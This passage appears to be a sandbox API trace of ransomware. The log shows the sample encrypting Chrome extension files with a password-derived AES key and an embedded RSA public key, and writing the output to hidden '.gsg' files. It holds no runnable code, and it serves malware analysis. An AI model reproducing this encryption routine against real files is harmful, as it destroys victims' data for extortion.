data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.fuck")) returned 1 [0258.455] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.455] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0258.456] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0258.456] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.456] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0258.456] GetLastError () returned 0x0 [0258.456] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js")) returned 0x20 [0258.456] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js", dwFileAttributes=0x80) returned 1 [0258.456] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.457] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.458] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.gsg", dwFileAttributes=0x2) returned 1 [0258.458] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0258.460] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0258.460] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.460] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.460] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0258.460] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.460] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0258.460] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e7b8a8) returned 1 [0258.461] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b8a8, dwCertEncodingType=0x1, pInfo=0x2e26960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26998*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7ff00) returned 1 [0258.461] CryptEncrypt (in: hKey=0x2e7ff00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0258.461] CryptEncrypt (in: hKey=0x2e7ff00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7bb50*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e7bb50*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0258.461] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e7bb50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e7bb50*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0258.466] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.468] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.468] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.471] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.471] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.471] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.472] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.473] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.473] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.473] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.473] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.473] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.473] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.474] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.474] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.474] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.474] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.474] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.474] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.475] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.475] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.476] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.476] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.476] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.476] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.476] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, 